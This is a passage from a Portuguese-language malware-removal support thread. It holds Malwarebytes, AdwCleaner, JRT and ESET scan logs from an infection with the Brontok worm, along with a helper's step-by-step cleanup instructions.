    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\attila.afra@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@digicool.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\barry@zope.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bbb@ddd.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bbb@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob.smith@foo.tv.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@1.1.1.123.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@a.b.c.d.info.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob@vsnl.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob_smith@foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\boehm@acm.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bruno@thefoundry.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cc@dd.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ccc@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\charsets@apple.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\CIP@autodesk.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cloudream@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cmlenz@gmx.de.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cmorley@vermontel.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\collver1@attbi.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\abuse@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\bob.smith@foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\copyright@riotgames.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dscherer@cmu.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe.tillis@unit.army.mil.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lu_zero@gentoo.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ppp@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\solar@openwall.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cosmint@cs.ubbcluj.ro.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cpasjuste@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\cravindogs@cravindogs.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\c_rios@sonda.cl.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\daniel@haxx.se.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\david@megginson.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ddd@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\deadwisdom@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\design@bigelowandholmes.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dickey@invisible-island.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\diegog@unizar.es.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\doctor.z01db3rg@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dominik.reichl@t-online.de.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dominionx@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\dperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\edab.7804f5cb8070@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\eduardolundgren@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\eee@zzz.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\email@email.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\fdrake@acm.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\foo12@foo.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\foo99@foo.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\gerard@libmng.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B01D0B8X@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B01D0B8Y@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B04D0B8X@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B4GD0888@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\GK500B4HD0888@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\grupoepiffania@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\gzip@prep.ai.mit.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\help@uunet.uu.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\henryi@oxy.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ian@chiark.greenend.org.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\igor@mir2.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jack_rabbit@slims.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\james@conceptofzero.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jangel1@cougar.noc.ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jangel1@ucla.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jloup@gzip.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@aol.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@company.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@web.info.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joe@wrox.co.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\johan.paul@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jonas@edgewall.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jorge@iryoku.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\joseluisblancoc@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\jseward@bzip.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\justivo@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kbk@shore.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kbwood@virginbroadband.com.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\kmatsui@t3.rim.or.jp.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\krinklemail@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lorenm@u.washington.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\lowe@cs.ubc.ca.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\m@marcgrabanski.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\madler@alumni.caltech.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\mailserv@ietf.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\mariusm@cs.ubc.ca.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\markus.oberhumer@jk.uni-linz.ac.at.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\memon@inside.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\michael_borgsys@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ml1050@cdata.tvnet.hu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\monty@xiph.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\nobody@python.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\None@bounce2.pobox.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ogg@illiminable.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pascal@obry.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pass@bleh.gif.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pesterhazy@gmx.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\pickle136@sbcglobal.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\privacy.questions@autodesk.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\privacy@riotgames.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\randeg@alumni.rpi.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ross@ross.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sax@megginson.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\scoffman@wellpartner.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\scr@socal-raves.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sdl_touch@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\Silvia.Pfeiffer@csiro.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\silvia@annodex.net.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\simon.hvala@hotmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\simon@thekelleys.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sjs@essex.ac.uk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\skip@pobox.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\slouken@libsdl.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\snowlion@sprynet.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\srl@jtcsv.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ssmith@aspalliance.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\stecnico@ea.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\stevenj@alum.mit.edu.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\sv@phystech.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\tekninentuki@europe.ea.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\Todd.Miller@courtesan.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\tony@trirand.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\uberlord@gentoo.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ui@jquery.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ultimo.lugar@grid.f1.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\user.name@mail.foo.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\verdy_p@wanadoo.fr.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\xx@xx.dk.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\yoichi@fore.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\zlib@gzip.org.ini, Quarentena, [2750], [370221],1.0.2826

    Setor físico: 0
    (Nenhum item malicioso detectado)


    (end)

     

    AdwCleaner

     

    # AdwCleaner 7.0.2.1 - Logfile created on Mon Sep 18 02:15:43 2017
    # Updated on 2017/29/08 by Malwarebytes 
    # Running on Windows 7 Professional (X64)
    # Mode: clean
    # Support: https://www.malwarebytes.com/support

    ***** [ Services ] *****

    Deleted: Update service


    ***** [ Folders ] *****

    No malicious folders deleted.

    ***** [ Files ] *****

    No malicious files deleted.

    ***** [ DLL ] *****

    No malicious DLLs cleaned.

    ***** [ WMI ] *****

    No malicious WMI cleaned.

    ***** [ Shortcuts ] *****

    No malicious shortcuts cleaned.

    ***** [ Tasks ] *****

    No malicious tasks deleted.

    ***** [ Registry ] *****

    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{30AE1F99-9CDB-4895-BEA4-C19346EA74EA}C:\program files (x86)\popcorn time\popcorntimedesktop.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{2954336B-B381-4DDF-8E2B-42A205A5AC2E}C:\program files (x86)\popcorn time\popcorntimedesktop.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{5A3A4798-1401-4480-BFAC-0CB7B367CC38}C:\program files (x86)\popcorn time\chromecast\node.exe
    Deleted: [Value] - HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{BD0D6614-E21D-4501-923E-59D0D0782BC6}C:\program files (x86)\popcorn time\chromecast\node.exe
    Deleted: [Key] - HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application
    Deleted: [Key] - HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application
    Deleted: [Key] - HKLM\SOFTWARE\MozillaPlugins\@pandonetworks.com\PandoWebPlugin


    ***** [ Firefox (and derivatives) ] *****

    No malicious Firefox entries deleted.

    ***** [ Chromium (and derivatives) ] *****

    No malicious Chromium entries deleted.

    *************************

    ::Tracing keys deleted
    ::Winsock settings cleared
    ::Additional Actions: 0

    *************************

    C:/AdwCleaner/AdwCleaner[C0].txt - [2182 B] - [2017/9/14 0:38:41]
    C:/AdwCleaner/AdwCleaner[S0].txt - [2118 B] - [2017/9/14 0:37:59]
    C:/AdwCleaner/AdwCleaner[S1].txt - [2274 B] - [2017/9/18 2:15:27]


    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########

     

    JRT

     

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.4 (07.09.2017)
    Operating System: Windows 7 Professional x64 
    Ran by A (Administrator) on 17/09/2017 at 23:49:06,48
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


    File System: 11 

    Successfully deleted: C:\Users\A\AppData\Roaming\3909 (Folder) 
    Successfully deleted: C:\Users\A\AppData\Roaming\convert audio free (Folder) 
    Successfully deleted: C:\Users\A\AppData\Roaming\pdfforge (Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BB8ZGNM9 (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GAI7SODA (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I3BCV9ID (Temporary Internet Files Folder) 
    Successfully deleted: C:\Users\A\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XI5WRL3O (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BB8ZGNM9 (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GAI7SODA (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I3BCV9ID (Temporary Internet Files Folder) 
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XI5WRL3O (Temporary Internet Files Folder) 

    Registry: 0 

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 17/09/2017 at 23:50:41,94
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     

     

     

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Seu computador está infectado com um tipo de worm que se espalha através de qualquer tipo de dispositivo de armazenamento removível (pendrives, HD externo, mp3, mp4, celulares, cartões de memória, câmeras fotográficas) e também através de outras máquinas ligadas em rede.

    Para evitar que seu computador seja reinfectado, e para não infectar outros computadores, é necessário que você formate o dispositivo em questão.
    Se houver mais de um, todos devem ser formatados e não devem ser utilizados em nenhum pc até que terminemos a limpeza, de modo a conseguirmos desinfectar este computador.

    É recomendável que você troque todas as senhas armazenadas neste pc. Se você usou ou usa o internet banking, comunique suas instituições financeiras sobre o ocorrido e troque as senhas urgentemente.

    Faça o download do Panda USB Vaccine e salve na sua área de trabalho.

    • Conecte todos os dispositivos de armazenamento removível nas portas USBs. Salve o que achar necessário,EXCETO arquivos executáveis, depois formate as mídias, indo em Meu Computador e clicando com o direito sobre a unidade da mídia, escolhendo a opção "Formatar"
    • Execute o Panda USB Vaccine
    • Vá seguindo os prompts que poderão aparecer.
    • Espere até que o programa conclua a busca e depois saia do programa.

    Ainda com as mídias plugadas nas USB, vamos à próxima etapa:

    Desative temporariamente seu Antivirus e Firewall

    • Clique em esetsmartinstaller_enu.exe para baixar o ESET Smart Intaller. Salve-o em seu desktop. 
    • Execute o esetsmartinstaller_enu.exe.
      ** Usuários do Windows Vista, Windows 7 e Windows 8/8.1:
      Clique com o direito sobre o esetsmartinstaller_enu.exe, depois clique em VRIfczU.png .
    • Marque "YES, I accept the Terms of Use."
    • Aguarde o programa realizar o download dos componentes. 
    • Marque:
      • Enable detection of potentially unwanted applications.
    • Clique em Advanced settings e marque o seguinte:
      • Remove found threats
      • Scan archives
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth technology
    • Na opção "Current scan targets: Operating memory, Local drives" clique em Change...
    • Marque:
      • Todos os drives e mídias removíveis, caso estejam plugadas (C:, D:, E:, etc)
    • Clique em OK
    • Agora clique em START
    • Ele vai atualizar por conta própria, e escanear o computador. Tenha paciência, o processo pode demorar horas.
    • Quando o scan terminar, clique em List of found threats
    • Clique em Copy to clipboard e cole o conteúdo em sua próxima resposta. Obs: Se nada for encontrado, nenhum log será gerado.
    • Clique em Back.
    • Clique em Finish.
    • Será oferecido uma instalação do Eset Smart Security versão paga.Clique no [x] do canto direito da janela.

     

    OBS: Após o procedimento acima, poste novo log do MBAM.

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Aqui

     

    ESET log

     

    \\Lucas-pc\Users\A\Desktop\Desktop\amtemu.v0.9.2-painter.rar    a variant of Win32/HackTool.Crack.FS potentially unsafe application    
    C:\Users\A\Desktop\Desktop\amtemu.v0.9.2-painter.rar    a variant of Win32/HackTool.Crack.FS potentially unsafe application    deleted
    E:\Lucas\pendrive\Pendrive\RegCure\RegCure Pro 3.1.6 (Mr7ech)\RegCureProSetup_RW.exe    a variant of Win32/RegCure.A potentially unwanted application    cleaned by deleting
    E:\Lucas\pendrive\Pendrive\RegCure\RegCure Pro 3.1.6 (Mr7ech)\Crack (Mr7ech)\Regcurepro.exe    a variant of Win32/RegCure.A potentially unwanted application    cleaned by deleting

     

    Mbam

     

    Malwarebytes
